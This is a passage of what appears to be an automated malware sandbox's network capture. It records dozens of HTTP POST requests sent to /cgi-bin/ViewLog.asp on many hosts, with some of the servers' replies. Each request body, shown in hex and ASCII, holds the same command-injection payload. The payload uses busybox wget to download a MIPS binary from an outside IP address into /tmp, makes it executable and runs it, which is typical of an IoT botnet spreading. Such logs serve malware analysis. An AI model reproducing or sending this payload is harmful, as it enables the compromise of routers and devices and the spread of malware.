                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:21.638674021 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              57192.168.2.136047894.121.121.508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:17.574071884 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              58192.168.2.135978894.253.16.1918080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:17.577554941 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:17.812081099 CET75INHTTP/1.1
                                              Data Raw:
                                              Data Ascii:


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              59192.168.2.133803862.29.56.618080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:17.578794003 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              60192.168.2.135098085.187.9.428080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:17.786859989 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:17.999159098 CET278INHTTP/1.1 403 Forbidden
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 106
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              61192.168.2.135978495.142.42.528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:17.990797997 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:18.205878973 CET1340INHTTP/1.1 200 OK
                                              Date: Thu, 23 Nov 2023 04:15:18 GMT
                                              Server: Apache/2.4.29 (Ubuntu)
                                              Set-Cookie: PHPSESSID=31u84j15nqd7mvk52pq30vi1dn; path=/
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip
                                              Content-Length: 1328
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 18 db 6e dc 44 f4 b9 f9 8a 89 1f 10 88 8c bd a9 5a a8 c2 ee 56 22 34 12 15 a5 51 08 20 9e aa b1 3d eb 9d 64 ec 71 67 c6 7b 41 3c 44 45 e2 85 4a 45 f0 00 6f fc 42 54 14 51 68 1b 7e c1 fb 47 9c 19 db 7b bf 65 d3 aa 91 12 db 67 ce 6d ce fd 64 ab be fd d9 c3 fd e3 ef 0e ef a1 b6 8e 79 73 ab 5e 3c e0 49 49 d8 dc 42 f0 53 8f a9 26 28 68 13 a9 a8 6e 38 5f 1f 1f e0 3b ce c4 91 48 34 4d e0 a8 cb 42 dd 6e 84 b4 c3 02 8a ed c7 0e 62 09 d3 8c 70 ac 02 c2 69 63 77 07 c5 a4 c7 e2 2c 1e 01 32 45 a5 fd 22 3e 00 12 e1 a0 84 c4 b4 e1 74 18 ed a6 42 ea 4a 96 66 9a d3 66 fe 4b fe 7c f0 24 bf 1c 9c e5 2f f2 bf f3 f3 c1 4f f9 8b c1 33 f4 03 ca 7f cb 5f e6 e7 f9 f3 fc f5 e0 e7 fc 02 e5 bf 5a 9c 4b c0 3d 47 fb 47 0f ea 5e 41 5f f0 da c6 18 1d 10 d0 53 24 18 97 30 ce 92 53 24 29 6f 38 06 ec a0 b6 a4 ad 86 d3 2a b0 5c f8 e3 20 dd 4f 41 31 16 93 88 7a 3d 6c d1 c0 56 37 6e 14 b4 05 81 97 f2 2c 62 89 f2 4e 1e 67 54 f6 b1 4a 59 92 50 e9 05 4a 79 be 10 5a 69 49 d2 0a ea c6 2c 71 e1 c4 29 04 2b dd e7 54 b5 29 d5 95 2c 4d 7b da 90 82 9c 49 31 6d ad 53 b5 e7 79 2d 30 be 72 23 21 22 4e 49 ca 94 1b 88 d8 10 dc 6d 91 98 f1 7e e3 48 f8 42 8b bd 5b b5 da ce c7 b5 da 7b 2a f3 8d 17 39 d1 2c d9 09 fa 92 71 ce 02 0c 42 de b0 06 c6 36 95 0a 0f 88 a6 12 62 e0 c3 cf 01 b8 c1 55 87 16 1d 9a 6f d2 98 9b 19 70 c8 35 11 21 44 2b e9 50 e5 d9 bf d7 64 47 12 88 0f 4d b1 51 b1 7c df 90 a3 e1 60 f1 af 41 1f 64 4a 8b f8 1a 0c 74 9b c6 60 19 c2 39 2e 5e 37 e4 e5 05 60 66 b7 c8 09 1b 21 19 f3 76 dd dd 9b ee 6e 25 c2 27 8a 56 49 93 b1 b5 c5 40 ad f2 8a 62 55 f7 45 d8 47 01 27 4a 35 1c 2e c0 1b 38 85 4c 45 96 3f e6 2c 6a 6b ec f3 8c 3a 63 45 e0 d0 20 7c 21 48 48 25 1a 56 82 90 75 2a 36 86 01 e6 f6 1c 77 21 d6 52 2a 4b f2 69 cc 02 69 ec 70 86 15 5c 66 1e ce 34 5e 59 1a 30 27 7d 50 2a e5 58 d2 70 0e c9 34 59 c0 64 c0 21 ec 38 33 4a 22 4e 5b 7a 01 d5 7c 4a a7 59 f7 00 b8 40 d0 92 a3 c5 3a 48 63 f2 b7 ae c4 1c f0 3c 50 da cc 7f 87 fe f0 d7 e0 6c f0 23 34 8e 7f f3 73 d7 75 eb 5e 3a e6 cd 11 55 f9 0a 41 3c e5 63 13 54 be e8 2d 8c 81 48 4c 47 00 29 33 e0 84 74 88 0a 24 4b f5 5e 47 b0 f0 fd da 07 9f c0 6d 59 1c 21 25 03 48 10 db 55 94 67 58 b8 69 12 19 4b 90 b9 ba cd 58 8e c8 e9 f8 18 3f 36 49 31 2f e2 5a 42 c6 88 85 10 6f 2c 4a 1e 31 68 78 d0 cc db 02 00 87 0f bf 3a 5e 23 e0 62 05 4a ce 6f c7 6b 86 0b 4b d2 4c e3 48 8a 2c 5d 16 25 2a 25 c9 1c 12 4c c2 d0 36 e0 45 84 96 98 0d d5 2d bb 90 6d db 50 39 20 40 95 48 ea 1e 5b 22 d9 33 a2 d7 8b 5f 63 4e a8 31 09 5d a9 90 b9 c1 58 1d 73 26 38 98 59 4a 0a 5e cd 40 36 e0 1c 28 02 24 a0 6d c1 a1 78 34 9c fc
                                              Data Ascii: nDZV"4Q =dqg{A<DEJEoBTQh~G{egmdys^<IIBS&(hn8_;H4MBnbpicw,2E">tBJffK|$/O3_ZK=GG^A_S$0S$)o8*\ OA1z=lV7n,bNgTJYPJyZiI,q)+T),M{I1mSy-0r#!"NIm~HB[{*9,qB6bUop5!D+PdGMQ|`AdJt`9.^7`f!vn%'VI@bUEG'J5.8LE?,jk:cE |!HH%Vu*6w!R*Kiip\f4^Y0'}P*Xp4Yd!83J"N[z|JY@:Hc<Pl#4su^:UA<cT-HLG)3t$K^GmY!%HUgXiKX?6I1/ZBo,J1hx:^#bJokKLH,]%*%L6E-mP9 @H["3_cN1]Xs&8YJ^@6($mx4


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              62192.168.2.134576294.122.68.1758080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:18.005858898 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              63192.168.2.135029485.153.151.558080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:18.013065100 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:18.243282080 CET239INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 1095
                                              Date: Thu, 23 Nov 2023 04:15:17 GMT


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              64192.168.2.135839694.121.119.1338080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:18.021228075 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              65192.168.2.135537495.86.124.218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:18.021361113 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              66192.168.2.134198894.122.235.408080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:18.030504942 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              67192.168.2.135188631.136.225.818080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:20.972875118 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:21.542665005 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:22.694659948 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:25.222748041 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:29.830621004 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:39.046619892 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:59.014622927 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:35.878482103 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              68192.168.2.135744294.13.187.1708080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:20.976622105 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
